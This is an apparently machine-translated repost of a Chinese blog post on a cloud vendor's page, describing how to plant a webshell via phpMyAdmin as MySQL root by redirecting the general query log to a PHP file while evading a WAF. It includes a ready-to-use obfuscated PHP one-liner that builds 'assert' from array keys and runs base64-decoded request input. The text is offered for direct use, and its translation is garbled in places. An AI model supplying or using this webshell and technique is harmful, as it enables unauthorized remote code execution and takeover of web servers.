Home > Developer > Web Develop

phpMyAdmin New Posture Getshell

Source: Internet
Author: User
Tags phpmyadmin
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Narrator: How do I getshell in a scenario with a WAF and an into outfile in MySQL?

Tilt rotation
Email:[email protected]
Submission Contact: [Email protected]

The first environment is as follows:

    • Os:windows 2003
    • Waf:safe Dog 4.0 Official edition
    • phpmyadmin:4.7 (many can)
    • mysql:5.5+
    • php:5.3
    • apache:2.x

is currently into outfile disabled, and WAF is also intercepted when writing to a file.
So we're trying to getshell through a big hole in the brain.
(必须是mysql root权限)

After logging in to phpMyAdmin, view the global variables:
Found itgeneral log file

Here is the log that stores each SQL statement execution (including the SQL statement itself)

However general log , the variable must be on state, which means enable.

At this point we turn general log ON on and then go to change general log file the address to our webshell absolute path.

At each change general log file , MySQL will determine if the log file exists and will be created automatically if it does not exist.

The file is now created, and the file contents hold the log information for the last SQL statement.

MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 QuerySHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit

Next, we directly query SQL, each sentence will be written to this shell.php

Because of the WAF, we run Webshell in the form of a remote inclusion.
In our remote address, put the function name, let the server side access it, and then load into memory, go directly to call this function, and then to receive our submitted PHP code.

Please see an article about Chopper-free killing.

The following is attached to a SQL query to avoid the shell statement, so that you can encounter such situations directly use:

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

There is no interception on this side:

Article on to here, these days more busy, have not how to update, thank you all have been support!

phpMyAdmin New Posture Getshell

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
open new phpmyadmin window phpmyadmin add new user phpmyadmin create new database phpmyadmin create new user phpmyadmin new user ergo posture how to create new database in phpmyadmin

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More